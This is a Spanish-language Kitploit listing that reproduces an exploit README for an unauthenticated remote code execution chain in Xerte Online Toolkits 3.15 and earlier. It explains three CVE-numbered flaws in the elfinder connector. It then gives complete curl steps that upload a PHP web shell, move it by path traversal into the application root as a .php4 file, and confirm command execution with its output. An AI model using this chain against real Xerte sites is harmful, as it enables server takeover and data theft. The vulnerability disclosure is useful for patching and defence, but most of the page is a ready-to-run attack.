Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xerteonlinetoolkits-rce — Exploit no autenticado de Xerte Online Toolkits. Requiere conocer un nombre de usuario válido. | Kitploit
Herramientas/GitHubGitHub/bootstrapbool/xerteonlinetoolkits-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubbootstrapbool/xerteonlinetoolkits-rce

xerteonlinetoolkits-rce

Exploit no autenticado de Xerte Online Toolkits. Requiere conocer un nombre de usuario válido.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 mesesAún no revisado

Xerte Online Toolkits <= 3.15 Ejecución Remota de Código

Las versiones 3.15 y anteriores de Xerte Online Toolkits sufren de 3 vulnerabilidades en el componente /editor/elfinder/php/connector.php, que pueden ser encadenadas por un atacante no autenticado para lograr Ejecución Remota de Código (RCE).

Versiones Afectadas

Xerte Online Toolkits <= 3.15

Se ha aplicado un parche retroportado a las versiones 3.15, 3.14 y 3.13

CWE-306: Autenticación Ausente para una Función Crítica - CVE-2026-34413

Los usuarios no autenticados pueden realizar solicitudes al componente connector en /editor/elfinder/php/connector.php

El siguiente código se utiliza como control de acceso.

Archivo: /editor/elfinder/php/connector.php Número de línea: 35

root@kitploit:~
if (!isset($_SESSION['toolkits_logon_id'])){
    header("location: ../../../index.php");
}

Esto redirige a los usuarios no autenticados impidiéndoles recibir la respuesta de las solicitudes no autenticadas, sin embargo esto no termina la sesión y el código posterior aún se ejecuta.

CWE-23: Salto de Ruta Relativo - CVE-2026-34414

*Requiere que el atacante conozca el nombre del archivo que quiere mover

Los atacantes pueden manipular el parámetro "name" en una solicitud "rename" al endpoint connector.php. Esto permite a los atacantes usar un directorio existente para mover archivos fuera del directorio de medios del usuario.

CWE-184: Lista Incompleta de Entradas No Permitidas - CVE-2026-34415

Debido a un error en la expresión regular del filtro de extensiones de archivo en connector.php, los atacantes pueden encadenar una vulnerabilidad de salto de ruta presente en las mismas versiones de Xerte para mover un archivo con código PHP malicioso a la raíz de la aplicación con una extensión .php4.

Archivo: /editor/elfinder/php/connector.php Número de línea: 130

root@kitploit:~
array( // hide readmes
    'pattern' => '/(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$/i',
    'read'   => false,

La expresión regular php* solo coincide con el carácter precedente. Por lo tanto, coincidiría con "ph", "php", "phppp", etc...

Pasos de Reproducción del Vector de Ataque Encadenado

Ejecución Remota de Código sin Autenticación

Si la autenticación está habilitada (que no es la configuración predeterminada de Xerte), entonces un atacante debe conocer (o forzar por fuerza bruta) el nombre de usuario de un usuario válido. Si se usa la autenticación de Invitado (la predeterminada), entonces el directorio del proyecto objetivo sería simplemente 1--Nottingham.

Un atacante no autenticado puede crear un directorio "example_dir" y subir un archivo "file.txt" con código PHP malicioso a cualquier directorio de proyecto bajo USER-FILES/

Luego puede usar las vulnerabilidades de Salto de Ruta Relativo y Lista Incompleta de Entradas No Permitidas presentes en Xerte para realizar un salto de ruta cambiando el nombre del archivo subido a "example_dir/../../../../file.php4", moviendo file.txt a la raíz de la aplicación como "file.php4", otorgando al atacante ejecución remota de código.

  1. Obtener la ruta completa de la raíz de la aplicación
root@kitploit:~
curl 'http://localhost/xt/setup'
  1. Crear el directorio

Parámetros de la solicitud: uploadDir: Raíz de la aplicación + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL del directorio del proyecto cmd: mkdir name: El nombre del nuevo directorio target: El id de elfinder del directorio media/. Debido a que esta es la raíz de elfinder, siempre será "l1_Lw"

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=mkdir&name=folder1&target=l1_Lw'
  1. Subir un archivo PHP malicioso

*La etiqueta
en el payload evita que el filtro de tipo MIME de elfinder detecte código PHP.

Parámetros de la solicitud: uploadDir: Raíz de la aplicación + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL del directorio del proyecto cmd: upload target: El id de elfinder del directorio media/. Debido a que esta es la raíz de elfinder, siempre será "l1_Lw" upload[]: El archivo a subir.

root@kitploit:~
echo '<br><?php system($_GET["cmd"]); ?>' > file.txt
curl -X POST 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/' \
    -F 'cmd=upload' \
    -F 'target=l1_Lw' \
    -F "upload[][email protected];type=text/plain"
  1. Generar el id de elfinder para el nuevo archivo
root@kitploit:~
echo -n 'file.txt' | base64
ZmlsZS50eHQ=

Asegúrese de eliminar el relleno (padding), en este caso es solo "="

Agregue el identificador de volumen. Este siempre será "l1" (como en "/")

Resultado: l1_ZmlsZS50eHQ

  1. Renombrar el archivo y realizar el Salto de Ruta Relativo

Parámetros de la solicitud: uploadDir: Raíz de la aplicación + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL del directorio del proyecto cmd: rename name: El nombre del directorio, la secuencia de salto de ruta y el nuevo nombre de archivo con extensión .php4 target: El id de elfinder que generamos a partir del nuevo archivo l1_ZmlsZS50eHQ

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=rename&name=folder1%2F..%2F..%2F..%2F..%2Fs.php4&target=l1_ZmlsZS50eHQ'
  1. Verificar la ejecución de código

Parámetros de la solicitud: cmd: El comando a ejecutar

root@kitploit:~
curl http://localhost/xt/s.php4?cmd=id
<br>uid=1(daemon) gid=1(daemon) groups=1(daemon)
Descargar herramienta